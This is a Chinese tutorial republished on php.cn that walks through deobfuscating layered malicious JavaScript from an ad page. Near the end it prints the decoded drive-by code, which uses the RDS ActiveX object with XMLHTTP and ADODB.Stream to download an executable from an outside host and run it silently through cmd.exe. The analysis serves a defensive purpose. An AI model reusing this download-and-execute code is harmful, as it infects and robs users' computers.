首頁 > web前端 > js教程 > 主體

jser必看的破解javascript各种加密的反向思维方法[原创]_javascript技巧

WBOY
發布: 2016-05-16 19:14:30
原創
1188 人瀏覽過

原创文章,转载请写明出处 脚本之家
才发现的破解javascript各种加密的反向思维方法,大家有好的方法都跟帖啊
最近发现了一个代码,加密了5层左右,我将破解到最后一步,而且不用javascript解密程序

用到的软件列表
1、迅雷(下载网页)直接浏览会执行的,看不到源代码
2、或用firefox这个软件可以直接浏览网址,由于firefox的特殊性,也推荐用这个浏览器
一、目标网址 http://www.e9ad.cn/pcdd/80-806.htm
我们用迅雷下载这个页面或用firefox浏览器浏览得到如下代码

复制代码 代码如下:



对于这个的解密呢,分析下
大家看下document.write(DFQC(42)+DFQC(126).....
这个DFQC(42),的DFQC就是解密var DFQC=function(a){return String.fromCharCode(a^22)}
下面我的解密代码也想好了,这个方法基本上可以破解好多的类似代码,大家可以看下这个代码

[Ctrl+A 全选 注:如需引入外部Js需刷新才能执行]

得到的解密的代码就是
复制代码 代码如下:



<script> <br /> function clear(){ <br /> Source=document.body.firstChild.data; <br /> document.open(); <br /> document.close(); <br /> document.title="gg"; <br /> document.body.innerHTML=Source; <br /> }</script>
ad





<script> <br /> <!-- <br /> window.defaultStatus=" "; <br /> //--> <br /> </script>


二、检查下上面的http://www.e9ad.cn/pcdd/8080.htm和http://pop.*****.com/777/index.htm
我发现下面的iframe加载的有问题,所以呢,
用下载工具下载http://pop.*****.com/777/index.htm这个页面的代码可以发现如下
复制代码 代码如下:


charset='gb2312'>

看这个大家应该会想起,好多网站卖流量类似的代码(就是卖流量的)
三、继续分析下 http://cc.*****.com/wm/index.htm
用下载工具下载这个页面,可以得到
复制代码 代码如下:



好的继续下载http://cc.*****.com/wm/1.js这个js文件我得到了这个代码
复制代码 代码如下:

大家看到上面的代码可能会发现无法解密了,我搜了下,发现了,竟然有解密代码了,此处可以分析,不
过我这篇文章的目地,是不用解密程序的,所有我用下面的方法,

[Ctrl+A 全选 注:如需引入外部Js需刷新才能执行]

上面的方法,我要是考虑下几秒想到的方法,以前没想起,现在大家以后就可以更方面的使用了
先将eval后的代码用 var str=.......,然后document.write(str);得到了下面的代码
复制代码 代码如下:

function gn(n){var number=Math.random()*n;return'~tmp'+'.tmp'}try
{dl='http://cc.*****.com/wm/mm.exe';var df=document.createElement("object");df.setAttribute
("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var x=df.CreateObject
("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P","");var S=df.CreateObject
("Adodb.Stream","");S.type=1;x.open("GET",dl,0);x.send();fname1=gn(10000);var
F=df.CreateObject("Scripting.FileSystemObject","");var tmp=F.GetSpecialFolder
(0);fname1=F.BuildPath(tmp,fname1);S.Open();S.Write(x.responseBody);S.SaveToFile
(fname1,2);S.Close();var Q=df.CreateObject("Shell.Application","");exp1=F.BuildPath
(tmp+'\\system32','cmd.exe');Q.ShellExecute(exp1,' /c '+fname1,"","open",0)}catch(i){i=1}

然后我们可以发现这个http://cc.*****.com/wm/mm.exe,先下下载下来,记住下载后一般看大小,病毒
文件都很小,先将mm.exe改名位mm.exe.txt,打开看到了如下代码,唉,
复制代码 代码如下:




<script>window.location="/wm/mm.exe&#63;QVyRR=au6BKUDmtn1";</script>

如果您的页面没有自动跳转,请点击这里




看到了吗,最主要的就是这个了 http://cc.*****.com/wm/mm.exe?QVyRR=au6BKUDmtn1
然后用软件下载,这个就是病毒文件了,
终于完成了 ,发现病毒,应该是盗号系统的木马,现在网上卖流量的很多,大家爱玩游戏的请注意了

当然上面的javascript反向思维方法可以得到大部分的加密的 javascript,而且其它的好多都有解密程
序,大家如果好的方法,都贴出来啊,这样大家才能进步。作者:reterry QQ:461478385
原创文章,转载请写明出处 脚本之家
相關標籤:
來源:php.cn
本網站聲明
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn
熱門教學
更多>
最新下載
更多>
網站特效
網站源碼
網站素材
前端模板